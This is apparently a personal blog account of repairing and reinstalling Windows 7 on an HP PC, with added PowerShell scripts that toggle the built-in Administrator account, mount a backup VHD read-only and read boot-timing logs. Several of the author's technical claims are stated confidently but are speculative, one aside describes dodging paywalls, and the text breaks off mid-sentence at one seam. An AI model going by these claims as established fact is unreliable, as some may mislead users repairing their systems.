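As an added example (not from the original page), a PowerShell 2.0 script for Windows 7 that wraps the two 'net user' commands above with a check of the account's real state, so the built-in Administrator account can be confirmed enabled before the repair install and confirmed disabled again afterwards rather than left on. It finds the account by its well-known RID (-500) instead of by name; the function names are my own, and the enable/disable step needs an elevated prompt.

```powershell
# Added example, not from the original page. Checks and toggles the hidden
# built-in Administrator account on Windows 7 and verifies the result.

function Get-BuiltinAdministrator {
    # Local accounts only; the built-in Administrator always has a SID ending in -500,
    # which still finds it if the account has been renamed.
    Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount=True" |
        Where-Object { $_.SID -like 'S-1-5-21-*-500' } |
        Select-Object -First 1
}

function Test-BuiltinAdministratorEnabled {
    # Returns $true when the account is active, $false when it is disabled
    $acct = Get-BuiltinAdministrator
    if ($acct -eq $null) { throw "Built-in Administrator account not found" }
    return (-not $acct.Disabled)
}

function Set-BuiltinAdministratorEnabled {
    param([bool]$Enabled)
    $acct = Get-BuiltinAdministrator
    if ($acct -eq $null) { throw "Built-in Administrator account not found" }
    $name = $acct.Name
    $flag = if ($Enabled) { 'yes' } else { 'no' }
    # Same command the text uses, addressed by the account's actual name
    & net user $name "/active:$flag" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "net user failed with exit code $LASTEXITCODE" }
    # Re-read the account and confirm the change actually took effect
    $after = Test-BuiltinAdministratorEnabled
    if ($after -ne $Enabled) { throw "Account state did not change as requested" }
    return $after
}

# Typical use around a repair install:
#   Set-BuiltinAdministratorEnabled $true    # before: same effect as /active:yes
#   ... run the repair install ...
#   Set-BuiltinAdministratorEnabled $false   # after: so the account is not left enabled
"Built-in Administrator enabled: " + (Test-BuiltinAdministratorEnabled)
```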

There are several YouTube videos on this. I like this one which goes through the process step by step:

         http://www.youtube.com/watch?v=RC_5eb9wTfk               'Repair Install to Fix Windows 7 Without Reformatting by Britec'

        Here's the key Windows 7 screen from the video above; select 'Upgrade'. Note this option explicitly says you can keep your "files, setting and programs"!


my screen capture of the two repair install DVD options: no disk wipe (top), with disk wipe (bottom)
This repair DVD was made from the downloaded (Microsoft) xxxx.iso file.

Image backup file
        Before he starts he makes an (image) backup (crucial in case the install fails) to an external drive. He types 'backup' in the Start search window and selects the program 'Backup and Restore'; on this window click 'Create a System Image'. From the little I know an image backup is apparently a copy of all your data and programs (with settings) on the disk (you need as much free space on the USB drive as you have used on the computer's hard drive, as my test shows virtually no compression!), so (apparently) Restore can then take this file and expand it, putting your machine exactly back to where it was when the image was made (in other words everything saved since then will be erased).

        -- A system image is not only useful for a (complete) backup, but it can be used to move everything to a new hard drive (which needs to be the same size or bigger than the original drive)

        -- Re-imaging a disk drive takes minutes compared to hours to reinstall Windows.

        -- "system image can be several gigabytes or more"  This is a joke... these files are huge!

Image file(s) are huge!
        It takes 10-15 min for the system image program to set up and check disk space on external drives. It tells you how much disk space you need before you start. There is for all practical purposes no compression!! I need 671 Gbytes free. You have three save options: c: (system) 661 Gbytes, d: (HP_Recovery) 10 Gbytes, and 'System' (30 Gbytes), but for an image to back up the drive it seems pretty obvious you need to save everything. (I do in fact have room, because both my 2 Tbyte USB drives have 1.2 Tbytes free, about twice what is needed.)

Doing an image backup
        After gaining a little understanding about image files, and having plenty of space on my 2 Tbyte USB drives, I decided to make an image of my (whole) hard drive. This is the c:\ drive and Windows archive d:\ drive, which means selecting all three choices: (user) programs + data, system and system backup. (Correction: all three options are checked by default and cannot be unchecked, in other words the only choice is to image the whole drive.) My understanding is that this is a 100% copy of the entire drive (at least every sector in use), and an image restore will just copy it back (is the rest of the drive wiped??).

        This image backup is not of a clean stable Windows setup, because I am still having occasional blue screen crashes, though I have been booting reliably for the last few days. But if I suddenly find I can't boot, it would be very useful because it would allow me to get access to my programs. The procedure for this is to boot from the Windows recovery disk and select Image restore.

            c:\ drive              Windows + programs + data      703 Gbytes      (714 (655) Gbytes total hard drive used)
            d:\ drive              Windows archive backup          11 Gbytes
            USB 2 Tbyte drive      1.19 Tbytes free (prior)
                                   565 Gbytes free (post)         625 Gbytes image disk space = (1,190 - 565)
            USB directory          WindowsImageBackup             Properties: size: 653 GBytes, Read Only
            Image files            xxxxxxxx.vhd   (41 Gbytes)     'vhd' = virtual hard drive
                                   xxxxxyyy.vhd   (685 Gbytes)

        Yup, (virtually) no compression!  (The option to image backup to DVDs is a joke with modern high capacity drives.) You need free space on your USB drive that exceeds the space used on your local hard drive. (I inquired about doing a 2nd image backup to the same USB drive and am told there is not enough space, and this is before I get to choose what to back up!) I don't know how long the backup took because I did it overnight, but I presume it was hours.

        I read in a forum you can look at the contents of the .vhd backup files, so I right click Open and Windows tells me it doesn't know what program to use to open a file it just wrote! (More Windows stupidity or lying.) I googled how to view the contents and followed instructions in Computer Management, Disk Management to 'Attach VHD'. What it did was make an L: (tiny 36 Mbytes, system) and an M: (655 Gbytes, OS) drive that I can open with Explorer to see directories, but generally cannot access files. (I don't like this because I don't really understand what these drives are; they do not indicate anywhere that they are the .vhd file contents!)

Don't like what I see
        The directory listings I see in the 'vhd attached' m:\ drive worry me. It is only a partial listing and the directory with most of my personal files (Speed) is missing. Also, whereas most directories cannot be opened, a few can and files can be accessed, for example 'Comcast download of my corrupted homepage.' The program Turbo Tax even runs (and opens my return) on the m:\ drive. This is all very strange and not reassuring that if I ever need to use this image file as a backup that everything is there.
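As an added example (not from the original page), here is the 'Attach VHD' step above done with diskpart from PowerShell 2.0 on Windows 7, attaching the backup .vhd read-only so that poking around in it cannot modify the only copy of the backup, and reporting which drive letters belong to it (the point of confusion above). The function names and the VHD path are my own placeholders; it needs an elevated prompt.

```powershell
# Added example, not from the original page. Attaches a Windows backup .vhd
# read-only via diskpart, reports the drive letters it received, and detaches it.

function Invoke-DiskpartScript {
    # diskpart reads its commands from a script file given with /s
    param([string[]]$Lines)
    $script = [System.IO.Path]::GetTempFileName()
    $Lines | Set-Content -Path $script -Encoding ASCII
    try {
        $output = & diskpart.exe /s $script 2>&1
        if ($LASTEXITCODE -ne 0) { throw "diskpart failed:`n$($output -join "`n")" }
        return $output
    } finally {
        Remove-Item -Path $script -Force -ErrorAction SilentlyContinue
    }
}

function Mount-BackupVhdReadOnly {
    # Returns the drive letters that appeared as a result of the attach
    param([string]$VhdPath)
    if (-not (Test-Path -LiteralPath $VhdPath)) { throw "VHD not found: $VhdPath" }
    $before = Get-WmiObject Win32_LogicalDisk | ForEach-Object { $_.DeviceID }
    Invoke-DiskpartScript @(
        "select vdisk file=`"$VhdPath`"",
        "attach vdisk readonly"          # read-only: the backup file is never written to
    ) | Out-Null
    $after = Get-WmiObject Win32_LogicalDisk | ForEach-Object { $_.DeviceID }
    return @($after | Where-Object { $before -notcontains $_ })
}

function Dismount-BackupVhd {
    param([string]$VhdPath)
    Invoke-DiskpartScript @(
        "select vdisk file=`"$VhdPath`"",
        "detach vdisk"
    ) | Out-Null
}

# Placeholder path: substitute the .vhd under WindowsImageBackup on the USB drive
$vhd = 'E:\WindowsImageBackup\PLACEHOLDER-PC\Backup 0000-00-00 000000\PLACEHOLDER.vhd'
$letters = Mount-BackupVhdReadOnly $vhd
"Backup volumes attached read-only as: $($letters -join ', ')"
# ... inspect them with Explorer or Get-ChildItem, then release the file:
# Dismount-BackupVhd $vhd
```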

Bootrec.exe
        This is very specialized and looks like it should only be used by experts. It will repair boot sectors on Windows 7. Below is a Microsoft tutorial showing how to run it.  They suggest you run this after running 'Repair Computer'. Basically it's run from the Command Prompt option that you select from the recovery CD. It only seems to do one thing:  it fixes a damaged boot sector by writing a new one.

         http://support.microsoft.com/kb/927392                                         Microsoft tutorial on how to use Bootrec.exe
         http://www.youtube.com/watch?v=RC_5eb9wTfk                                Bootrec.exe tool ---- boot fix (for Vista!)

Windows reinstall and disk options (3/14)
        I tried all three Windows 7 repair tools to try and fix my unstable system, the two safe ones: disk repair (chkdsk), Windows file fix using d:\ archive (sfc /scannow), and the more difficult and risky repair approach: 'Windows repair install' using a DVD made from downloaded (Microsoft) Windows 7 .iso file.

        After repeated use of the first two (safe) repair tools failed to fix Windows, I proceeded on to the repair install. I made an image backup of my whole 750 Gbyte drive (90% full) saved to a USB drive, downloaded the (free) Windows 7 .iso file, downloaded and installed (free) PowerISO and used it to make a repair install DVD; it took 3 tries to get an error free write of the 3.2 Gbyte file to the DVD. And all this got me nowhere: the repair install hung halfway through (during a restart) leaving me with a scrambled hard drive. I tried to go back, but Windows Image restore was unable to find the USB drive (unbelievable!) leaving me with no option but to pull out my HP recovery disks and do a clean install of Windows 7, meaning a disk wipe, reinstall of Windows 7 in c:\ and the d:\ archive plus all the crap software that HP loads onto its retail computers.

        In a clean install all my programs and much of my data were lost. I did have file copies of my most critical data saved on a USB drive. As it happens I have long had two USB drives, so I had a 2nd external backup, but during these few weeks disk check utilities reported my 2nd USB drive had serious problems. I reformatted it, but it still had errors (it's toast, won't spin up properly). While I have ordered a replacement USB drive, it is not here yet, so for now my file backup is pretty thin with much of my data stored only on a single external hard drive.

** Types of Windows 7 disks
        The world of Windows 7 repair/recovery/install disks is a confusing zoo. This is a combination of two things: Microsoft puts in all kinds of restrictions on disk use to maximize the dollars they can extract from the world, and much worse their description of the disks is very poor and confusing. They never detail what the disks do, how they differ from other disks, and what restrictions there are on their use. Also Microsoft is not above lying here, for example the disks for a repair install Microsoft always calls 'upgrade' disks, but there is no upgrade when you put back the original OS. With a lot of digging I figured out the basics of the world of Windows 7 install and recovery disks.

        1) Recovery disk, which typically a user has his own computer write (though they can be bought on Amazon for $15 or so). A very useful disk and (nearly) free, but it only provides access to Windows repair tools and Windows image restore. It does not contain the Windows OS, so obviously it cannot be used to reinstall the OS.

        2a) Recovery disks bought (see below) from the computer manufacturer, in my case a set of five CD disks bought from HP.  Like most computers bought retail (Staples) my HP computer came with no disks, but I found out two years ago (from Staples repair techs) that you can buy a set of disks from HP that can re-install the entire Windows 7 OS on your computer. In effect you can buy the disks HP should have thrown in, but doesn't. This is a cheap way to buy a set of Windows disks; I paid $12 (+ $5 shipping) ordered online from HP support. Initially Staples was going to sell me the exact same disks for about $50! The big limitation of these cheap Windows disks (at least those from HP) is that they can only be used to put Windows back on the exact model number HP computer you buy them for. In other words you have to order Windows recovery disks for HP model xxxx, the model you own, and (almost for sure) the disks check the hardware and will only run on that model. These disks also put back all the bloat software (Norton, games, etc.) that HP had installed on the computer when it was new, and uninstalling all this crap takes hours (and involves some risk).

            Description: cheap set of disks that can install entire Windows 7 OS (plus HP bloat software) bought from computer manuf
            Limitations:
                            -- Can only be used on boot
                            -- Always wipes the entire drive
                            -- Only will install on a particular model HP computer (specified at disk purchase). No Windows key needed.

        2b) (update 3/18/14) Burn a set of (full) recovery DVDs.  On the HP site I was surprised to find an alternate (or replacement) way to get a (full) set of Recovery disks. I bought my recovery CDs online in 2012, but looking at the HP site recently it says HP Windows 7 computers can write (one time) their own full set of recovery DVDs, see 'Recovery Disk Creation'. This is not just the single recovery disk that provides access to recovery tools. This set of DVDs (typically three) can be used to restore even a corrupted hard drive, so this is the entire OS (plus bloat software), and while it doesn't say so it must run at boot. Almost for sure these homemade burned disks are the same as what HP sells. As with the purchased disks they can only be used to reinstall the OS on one specific computer model which, of course, is the model on which they are burned. Clearly the PC needs to be in good health when they are created, at a minimum the d:\partition must be uncorrupted and the PC stable enough to do the burning.

Totally confusing names and poor descriptions
        The horrible confusion of Windows backup and installation disks is evident on the HP support site. It is as clear as mud what the difference is between the (short) Recovery disk, which you burn (or buy) that just provides access to Windows repair tools and image backup, and a (full) set of Recovery DVDs that you either burn (or buy) that can install the whole OS on a corrupted (or new) blank drive (in same computer). They are both called Recovery disks. Gees!
        The location of the 'Recovery Disk Creation' page is below. I checked and it is there on my machine with its newly reinstalled Windows 7, and it will run, telling me it needs 3 DVDs (the video shows 4.7 Gbyte disks) with a burn time of 30 min/DVD. The software gives no specs, but the HP site says they recommend DVD+R disks, which is what I have. (Why, I wonder, does this take three DVDs when I know the repair install software is 3.2 Gbytes and fits on a single 4.7 Gbyte DVD?)

            Description: (nearly) free set of disks that can install entire Windows 7 OS (plus HP bloat software) burned by PC (when it is healthy)
            Burn with HP 'Recovery Disk Creation' program: Start, All Programs, Recovery Manager, Recovery Disk Creation
            Limitations:
                            -- Three DVD+Rs needed (30 min burn time/DVD when computer healthy)
                            -- Can only be used on boot
                            -- Always wipes the entire drive
                            -- Only will install on a particular model HP computer (the model which burns the DVDs). No Windows key needed.

Here's an HP video explaining how to have the computer write out its own full set of recovery DVDs: 'Welcome to Recover Media Creation'

         http://h10025.www1.hp.com/ewfrf/wc/document?docname=c01867124&lc=en&cc=us&dlc=en&product=5399832

       Looking around on the HP site so far I haven't found out how to buy a set of recovery disks. Is it possible they don't sell them any more and the only source of these full recovery disks is to burn them yourself? The video says contact HP if you need to buy the disks, but if they sell them they don't make it easy to find the support page.

        3) Microsoft makes available free online the entire Windows 7 OS (even upgraded with SP1) in the form of a single 3.2 Gbyte file. This option is not very well known (at least I had never heard of it). The file is in xxxx.iso format, which I have seen described as sort of a raw DVD format, which can be burned to a (single) 4.8 Gbyte DVD. It takes a special program to do this. I used PowerISO (free), and it is a relatively simple procedure except it took three tries to get a disk with no bad bytes, so three of my blank DVDs got used up.

        At first when I learned about this free OS file it made no sense to me. Why would Microsoft be giving away the Windows 7 OS, which is still for sale on Amazon for $100? The answer is that this disk will not run at boot (I verified this). It can only be run from within Windows, and it needs a Microsoft key (not supplied) to activate it, so it cannot be used to put Windows on a new (blank) hard drive. It's intended to allow Windows users to install an 'upgrade' version of Windows (if you have a key, presumably), and (not made clear by Microsoft) it can also reinstall the same operating system, which in the YouTube world is called a 'repair install'. In this case you reuse the Microsoft key on the side of the computer (or it can be extracted by a tool called Keyfinder, from Magical Jellybean). A repair install disk has two options (see attached screen capture): it can either first wipe the disk, or this step can be skipped, preserving your programs and data.

            Description: free, download file, burn to DVD with entire OS using your built-in DVD drive
            Limitations:
                            -- Can only be run from Windows desktop (will not run at boot)
                            -- Needs a Windows key to activate it (not a problem for a repair install as the original Windows key can be reused)

        4) OEM Windows. Amazon is selling the Windows 7 OS for $98, full OS on a (single) DVD (with SP1) supplied with a Windows key. The target customer is people building their own computer system. Amazon reviewers call this OEM Windows. It will install Windows 7 on any blank hard drive. Reviewers say it then becomes 'locked to the hardware'. Presumably what this means is that it can only be used one time to install to any blank hard drive, and from that point on it will only reinstall to that motherboard, becoming locked to it the same way the HP recovery disks are. In effect after one install (to a blank hard drive) it becomes the recovery disks for that one computer.

Windows 7 insurance
       ** Investing $100 now to buy this Windows 7 OEM DVD (while it is still available) may be good insurance to keep using Windows 7 in the future. It allows you to buy a retail Windows 8 computer, pop in the DVD and power up, and Windows 8 with all the bloat software installed by the vendor will be gone, replaced by a bloat-free version of Windows 7! (Confirmed by several Amazon reviewers who have done this.) People are reporting boot times with this DVD of 3 to 7 seconds! Of course you also may be missing a couple of useful (and necessary) utilities, like DVD write software, but I bet these utilities can be downloaded.

Try Windows 8 first
       A purchase of a Windows 8 machine with a backup Windows 7 OEM DVD allows you to try out Windows 8. Like it, keep it; don't like it, pop in the Windows 7 OEM DVD. Since new machines typically come with more RAM and USB 3, Windows 7 should run better than on older hardware. I checked to see if Windows 7 is compatible with USB 3.0, and replies from 2011 were that it had no native USB 3.0 support, but USB 3.0 drivers could be installed and work fine.

Warning on Windows 8 => Windows 7
        This article from PC Magazine walks through replacing Windows 8 and shows it's not so simple, especially for a laptop. It identifies three problems. The biggest seems to be Windows 7 drivers. New hardware will need Windows 7 drivers, which need to be tracked down and might not exist. The article advises preparing a memory stick with drivers along with the install OS disk. Another tricky problem is the BIOS. A Windows 8 machine is likely to have a new UEFI BIOS. They show going into Windows 8 to switch the BIOS back to 'legacy BIOS', needed to get the Windows 7 disk to boot. A still further complication is that in the install process you need to clean out the hard disk partitions of Windows 8 by separately formatting each and then combining the free space. After reading this article, buying a new Windows 7 machine looks a lot easier, the problem being they could disappear by the fall of 2014.

         http://www.pcmag.com/article2/0,2817,2417361,00.asp

        This game can be extended. I verified that Windows 8, like Windows 7, can write (full) recovery media (to DVD or memory stick), so if Windows 7 does not work out, pop in the Windows 8 media and reinstall it. I looked up Microsoft documentation online to verify that Windows 8 could write full recovery media, and (surprise!) the official Microsoft documentation is vague and confusing on what the disks do. Nowhere does it say the disks 'reinstall' Windows 8; it says the disks 'refresh' and 'reset' Windows 8. It is, however, clear that it writes the full OS because as part of the process, it asks you if you want to delete the d:\ partition (to free up disk space).

        And I guess the process can be done in reverse too (at least for a while). Buy a retail machine with Windows 7 and a retail or OEM copy of Windows 8 ($100 to $110). I was surprised that at my local Staples in Mar 2014 a year and a half after the release of Windows 8 two of the six desktops on display came with Windows 7.

            Description: $95 (a week later it's $98) OEM disks with full OS supplied with a key. Can install the OS one time to a blank hard disk and can only reinstall to the same computer. It can be used to replace Windows 8 with Windows 7 and at the same time remove all the bloat crap new retail machines come with.
            Limitations:
                            -- Expensive, no support
                            -- Runs only at boot, wipes disk
                            -- Can be used to add Windows to one new computer, later acting as recovery disks for just that computer

        5) Retail Windows. Not sure exactly how (or if) this is different from OEM disks. It may just be that the only real difference is that retail Windows comes with customer support from Microsoft, whereas when you buy a computer from say HP, they are expected to provide the support. Windows 7 retail disks are no longer for sale; Microsoft apparently enforces this. Amazon puts up a banner to this effect, and you cannot even find it on eBay, which talks of Microsoft restrictions. The reason it is no longer for sale is that Microsoft is gradually closing the door on Windows 7 to force users to Windows 8.
---------------------------------------------------------------------
My 'repair install' adventure (3/14)
       I had spent mucho hours over many days trying to repair Windows and was getting pretty fed up, so I popped in the DVD I made from the .iso file and began a repair install (following the YouTube repair install process). I didn't do more backups of my files (a mistake!) thinking if needed I could always reverse the disk wipe. The homemade DVD worked OK and the install went along fine until (as part of the process) it did a restart, and there it hung (even though my unstable Windows had been booting reliably lately). Now I had a half installed set of windows files.

        Ok, image restore to the rescue; this is why I made the image backup file a few days earlier.  It is supposedly a copy of the whole disk (maybe just the c:\ partition) containing not only Windows files, but all user programs and data. So I put in my recovery disk to access the image backup and guess what, freaking Microsoft image restore can't find my USB drive which has the backup file, even though I only have one USB drive connected and only one image backup on the external drive. When I pull out my tablet and research this, I see this is a common complaint: the drive with the backup file can't be found. Apparently image backup and restore is another poorly written Microsoft utility that won't run if you don't do a kabuki dance beforehand and know all the secret tricks.

        On YouTube a repair install looked pretty sweet, replace Windows files while keeping your programs, desktop and data, but in practice I found it is a different story. Trying to run this install on a shaky version of Windows is apparently very risky.

Missing 'trick' for USB image restore? (update 4/2/14)
       Maybe the images below show the missing 'trick' needed to make a Windows image restore from an image on a USB drive work. My image restore failed when (stupid) Windows could not find the USB drive where the image was stored, thus forcing on me a month of drudge work to reinstall everything. I see 'USB drive not found' is a common complaint; on the other hand I see articles where authors say Windows image and restore, while not fancy, is solid. If the latter is true, there has to be some 'trap' to avoid, or non-obvious 'trick', to make it work. (Pros who know how a complex procedure works often do not realize that there are traps to warn about or tricks to explain.)
        As I read between the lines below, it looks like the 'trick', or if you will the waiting 'trap' to avoid, involves either when the USB drive should be connected and/or hitting refresh at the right point to get it recognized. Their recipe, which presumably works, is to start the recovery process with the USB drive not connected. They connect the USB drive only when the 'select a system image' screen (left below) comes up, and they are pretty clear about this! In the next screen (right below) they hit refresh to get it recognized.

        Like all recipes it's not clear what happens if you deviate from it, but it might very well be that the process is delicate and these two steps need to be done just this way to get the USB drive recognized. (Sounds like Microsoft to me!) I know I didn't do it this way. I started the recovery process with the USB drive already connected, which seems totally logical to me. I don't remember if I hit refresh.


(source -- http://oakdome.com/k5/tutorials/windows-7-disk-imaging/restore-windows-7-from-backup.php)

I do a clean install with HP recovery disks
        Now with a scrambled hard drive and image restore not working I had no choice but to do a clean install. I verified that the homemade DVD would not do this; the System Recovery option is grayed out. So I pulled out my HP recovery disks. They start at boot, do a disk wipe and put the OS back on (plus of course all the crap software that HP loads onto its retail machines). These disks ran OK (tedious since you need to hand feed them), but I ended up with Windows like when I first bought the computer. First thing I made another effort to run image restore, this time from within stable Windows. I figured now there should be no problem finding the USB drive; after all it was showing up in Explorer, I could see the image file there. Think again! Even from within Windows with Explorer seeing the USB drive the image recovery program can't see it! Go figure, incompetent Microsoft in action. It occurred to me that I might have one more bite of the apple, that later some recovery of my data files might be possible if I could find a utility that could pry open the Windows image file that was still sitting on my USB drive.

        Now came the 'fun' 20-30 hour, several day job of de-crapifying the computer of HP bloat and recovering and setting up all my old programs. I was guided by a screen shot of my desktop I had recently taken of my unstable computer using the camera in my (Blackberry) tablet. I wish I had taken more photos, like a picture of my toolbar customization of the Opera browser, where I had added a lot of custom buttons. Some pictures of Explorer file listings would have been useful, like the startup directory. But before I started working on the programs, I decided to update Windows. I had been through this process a few days earlier, because before I could run the repair install (with built-in SP1), I had to upgrade my shaky OS to SP1, so I knew it was many hours. Windows told me it had like 100 critical updates and only after all these were installed did it bring up SP1, and it was installed. (A couple of days later it is telling me it has found about 50 more updates to install, all critical of course.) I was careful running sfc (no errors), chkdsk, and at the end defragging the disk (it normally runs automatically on a monthly schedule).

Recovery time update
        Yeah, a few days to get back 80%, so you are online, email works, the printer works. This is relatively easy stuff where the programs can be downloaded or pulled from disk and, critically, where the programs don't require too much set up. I made my image backup on Mar 8 and it is now March 25 and I am still only about 80% recovered.

        My recovery is long and hard, because I don't have a vanilla machine. I have a lot of hardware and custom software on my machine including a TV tuner, USB scanner, two 2 Tbyte USB drives, and a wireless printer/scanner combo. The TV tuner allows watching TV live and records TV programs to disk. It takes some time to rescan channels and set them in the order I like, but at least this is straightforward, I have done it many times before, so I know just what to do. The Canon wired/wireless printer/scanner MX452 was a bitch to install when it was new, and was a bitch to reinstall.

        During this backup effort, running hardware checks, I found one of my two WD 2 Tbyte drives was failing, so I bought a new WD 2 Tbyte drive, and spent mucho hours cleaning up the files on the good 2 Tbyte backup drive to speed copying them to the new 2 Tbyte drive. Even with this prep work it took three overnight sessions (10+ hours) to copy 600 Gbytes from one USB drive to the other.

        The new WD 'My Book' 2 Tbyte USB drive came with a free (lite) version of Acronis (True Image) backup software. Installing Acronis totally crashed my machine (or so I thought), and I had to resort to System Restore to regain control. It installed the 2nd time, but does not run normally, it just crawls, but still I found it has a use. Even crawling it is able to open the 600 Gbyte Windows disk image file that I made on Mar 8 before the new install, and unlike Windows, Acronis can extract files from this image backup! I pulled out the Freecorder (4 or 5) program directory, no longer available for download, and amazingly it runs. Freecorder 5 (or 4?) had been my workhorse program for capturing streaming video. It's an example of a highly customized program. When I originally got it, it provided video capture only as a toolbar in some browser. Playing with its .exe files I had figured out how to run it stand alone from the desktop and set it up (somehow) to capture Opera downloaded video. As recovered with Acronis, it is only capturing IE video, but I will see if I can fix this.

        I use the (old) Opera browser because it can be so highly customized and has built-in email. I have it customized with a bunch of custom buttons, all of which I have to search out again and reinstall. (The button that with one click turns javascript on/off is extremely useful to get around paywalls.) In the crash I lost all my Opera bookmarks, my email contact list, and my custom skin. At least I can build my contact list up by opening old emails stored on my server, but my bookmark list is gone, and custom skins are not supported on the Opera version 12 I installed.

        I had keyboard control of sound, which I found very useful. This
Let me list the remaining issues:

Boot is not normal
        When my desktop appears some programs run, and for many, many minutes (up to 15 minutes!) some don't run. When I click on these, there is the whirring wait cursor for a few seconds and then nothing happens: no cursor, the program does not start. Yet when I check Device Manager, I see the process has started. I had this problem before the clean install, and if anything it is now worse. I have no idea what's going on. I keep looking at the processes running, especially update services, and shutting them down, but no joy. During this extended wait time there will often be a couple of USB-like low frequency system tones, but what they indicate I have no idea. Chrome usually starts immediately, but the Opera browser will not, System Restore will not. I can open and work with local files.

        I have devised a test. Click on System Restore. When its screen (finally) pops up, I know the boot sequence is finally done, and everything will run normally. I need some sort of boot tracking program, but this will probably be very techy and a huge time burner. I know there is a list of boot processes in Windows, but no times attached, and I don't see anything. Another test I should do is pull off all my USB devices and time the boot as I add them back one by one.
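Windows 7 already keeps the boot timing the paragraph above is looking for: every boot is logged as event ID 100 in the Diagnostics-Performance event log, with the duration of each phase, and events 101-103 name the application, driver or service that slowed it down. The script below is an added example (not from the original essay) that reads those records; run it from an elevated PowerShell prompt.

```powershell
# Added example, not part of the original essay. Reads the per-boot timing records that
# Windows 7 writes to the Diagnostics-Performance log (event 100) and the "X slowed the
# boot" records (events 101 application, 102 driver, 103 service). The BootPostBootTime
# field is the phase after the desktop appears, i.e. the delay described above.
# Uses only PowerShell 2.0 features, so it runs on a stock Windows 7 install.

$log = 'Microsoft-Windows-Diagnostics-Performance/Operational'

function Get-BootTimes {
    param([int]$Last = 10)

    $events = Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 100 } -MaxEvents $Last -ErrorAction Stop

    foreach ($ev in $events) {
        # Phase durations (milliseconds) live in the EventData section of the event XML.
        $xml  = [xml]$ev.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        New-Object PSObject -Property @{
            Booted       = $ev.TimeCreated
            Severity     = $ev.LevelDisplayName        # Windows escalates this when a boot is slow
            TotalSec     = [math]::Round([int]$data['BootTime'] / 1000, 1)
            ToDesktopSec = [math]::Round([int]$data['MainPathBootTime'] / 1000, 1)
            PostBootSec  = [math]::Round([int]$data['BootPostBootTime'] / 1000, 1)  # desktop shown -> system idle
        }
    }
}

function Get-BootDelayCulprits {
    param([int]$Last = 50)
    # 101/102/103 each carry a message naming the offending application, driver or service;
    # the message is flattened to one line so it fits in a table.
    Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 101, 102, 103 } -MaxEvents $Last -ErrorAction SilentlyContinue |
        ForEach-Object {
            New-Object PSObject -Property @{
                Booted  = $_.TimeCreated
                Id      = $_.Id
                Message = ($_.Message -replace '\s+', ' ')
            }
        }
}

Get-BootTimes | Sort-Object Booted |
    Format-Table Booted, Severity, TotalSec, ToDesktopSec, PostBootSec -AutoSize
Get-BootDelayCulprits | Sort-Object Booted |
    Format-Table Booted, Id, Message -AutoSize -Wrap
```

A 15 to 20 minute wait after the desktop appears would show up as a PostBootSec value around 900 to 1200, and a driver that caused it as an event 102 row.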

Progress --- drivers (Update 3/27/14)
        I now think the strange minutes of delay it takes after my desktop appears for things to start up normally is related to drivers, probably USB drivers. I have been able to get very snappy performance, which unfortunately doesn't hold, by 'Uninstalling' drivers (USB and I think the disk drive driver) and letting Windows reinstall them. I had seen it recommended to Uninstall drivers to fix them. What I find happens is that after Uninstall you just wait, and Windows on its own will reinstall them.

* Windows driver reinstall --- Can take 5 to 10 minutes, and I need to turn on the 2nd screen to see what is happening.
'Advanced USB Port Monitor' utility
    I got a (free trial) utility to monitor USB ports: 'Advanced USB Port Monitor' from AGG Software. This helped a little and shows there was some flakiness with the card reader (USB) port. This port would flip back and forth in names and between not working (red) and working. The strange noises I had been hearing during the delay are USB type sounds. It shows which USB devices are on which USB ports, and this allowed me to map my USB ports physically. It is able to monitor port activity, but I didn't really explore that.

USB port mapping
        This utility tells me two USB hubs (#3 and #6) are used for my computer's six USB 2.0 ports. The mapping of the six USB 2 ports into the two hubs is rather odd. The two top rear USB ports are hub #6 (ports #1, #2) and presently my two 2 Tbyte USB backup drives are plugged in here. The built-in front panel card reader shows up in hub #6 too (as port #6). The remaining four USB 2 ports are hub #3 (ports #1 and #2 front, #3 and #4 on the 2nd row in rear). This is where my printer (rear), TV tuner and scanner go. Hub #7, which I think is USB 1.0, at bottom rear, is used for keyboard and mouse.

        The card reader is still enabled, but I rarely use this port, so I would probably be better off just disabling it permanently. I have a card reader cable for my camera cards. The only use I ever made of the built-in card reader is to load files on the tiny card in my Nook tablet. It fits into an adaptor, which I have long left in the computer slot. I thought the adaptor would be invisible with no card plugged into it, but I now find that when I plug in the empty adaptor it turns on a tiny LED next to it. So maybe there is an issue here with leaving the adaptor in the card port. I am sure I could buy another card reader cable for this small adaptor.

Windows updates never ending
        And Windows updates continue, almost daily, an unrelenting annoyance. I did over 100 after the install, with SP1 not offered. After that SP1 was offered, so I did a 2nd round of updates to get SP1. A couple of days later I am told there are 50 more updates waiting, every one of them, like the previous 110, labeled 'critical', so I do a 3rd round of updates. To enable this process I had set Windows updates to automatic; it didn't seem to work when I tried to manually search for updates.

        A week or so later when I boot my machine, the desktop does not appear, just a screen saying 'Do not turn off your computer, configuring Windows'. Is this a Windows update? Maybe, who knows, it doesn't say that. How long is this going to take? Who knows, no progress bar. This goes on and on, the screen shows no action except for an oscillating '.' After 15 minutes of this I am beginning to suspect whatever is happening has hung, but finally after 20 min or so the desktop appears. What a process, Microsoft doesn't ask, doesn't warn, just takes over your machine! A few hours later I am informed more critical updates are available, it's just one, so I install it. That was last night, I just booted this morning and guess what, the 'Windows updates available' on the taskbar is flashing again.

KMPlayer and VLC player
        I have hassled mucho hours with KMPlayer trying to get it to work right, including downloading and installing it three times! I have long used it, but cannot get the new version, and now a year old archive version, to work like it did before. It has several problems. Here are three:

        The defaults are weird. One of the reasons I use it is that it is flexible and allows old video, TV shows etc, to be better viewed because it has simple keyboard commands to adjust sharpness and light/darkness. But by default they don't work, and it is totally unclear how to enable them. I downloaded a year old version last night and again they weren't working. All of a sudden, without my doing anything specifically, they started to work!

Blue screen crash ! (2/26/14)
        Big problem is that the video and audio drift (quickly) out of sync, at least playing old SD TV shows. The video lags the audio. I have tried changing the bewildering array of video controls with no success. And last night the screen started acting weird and 30 minutes later (not using KMPlayer) I had a blue screen crash of the computer!! Yikes, after a clean install and three weeks work. I have my fingers crossed that my playing with the video controls, which causes the KMPlayer screen to go weird, might have triggered this crash. I immediately uninstalled KMPlayer (including preferences) and downloaded this time a year old archive version. VLC plays the same files OK with its defaults, but not with the same clarity (no sharpness filter).

Screen capture
